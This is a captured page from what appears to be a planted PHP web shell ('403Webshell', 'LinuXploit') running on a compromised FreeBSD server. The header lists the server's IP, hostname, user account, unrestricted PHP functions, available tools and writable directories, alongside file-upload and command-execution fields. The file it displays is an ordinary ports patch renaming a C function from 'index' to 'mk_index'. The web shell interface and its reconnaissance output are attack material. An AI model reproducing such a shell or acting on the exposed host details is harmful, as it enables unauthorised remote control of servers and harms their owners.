403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.238
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/textproc/sary/files/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/textproc/sary/files/patch-src_mksary.c
--- src/mksary.c.orig	2004-06-11 18:57:28 UTC
+++ src/mksary.c
@@ -59,7 +59,7 @@ CodesetFunc codeset_func_tab[] = {
 static SaryIpointFunc	dispatch_codeset_func	(const gchar *codeset);
 static SaryBuilder*	new_builder		(const gchar *file_name, 
 						 const gchar *array_name);
-static void		index			(SaryBuilder *builder,
+static void		mk_index		(SaryBuilder *builder,
 						 const gchar *file_name,
 						 const gchar *array_name);
 static void		sort			(SaryBuilder *builder,
@@ -149,7 +149,7 @@ new_builder (const gchar *file_name, const gchar *arra
 }
 
 static void
-index (SaryBuilder *builder,
+mk_index (SaryBuilder *builder,
        const gchar *file_name, 
        const gchar *array_name)
 {
@@ -186,7 +186,7 @@ index_and_sort (SaryBuilder *builder,
 		const gchar *file_name, 
 		const gchar *array_name)
 {
-    index(builder, file_name, array_name);
+    mk_index(builder, file_name, array_name);
     sort(builder, file_name, array_name);
 }
 
@@ -358,7 +358,7 @@ parse_options (int argc, char **argv)
 	    show_help();
 	    break;
 	case 'i':
-	    process = index;
+	    process = mk_index;
 	    break;
 	case 'l':
 	    ipoint_func = sary_ipoint_line;

Youez - 2016 - github.com/yon3zu
LinuXploit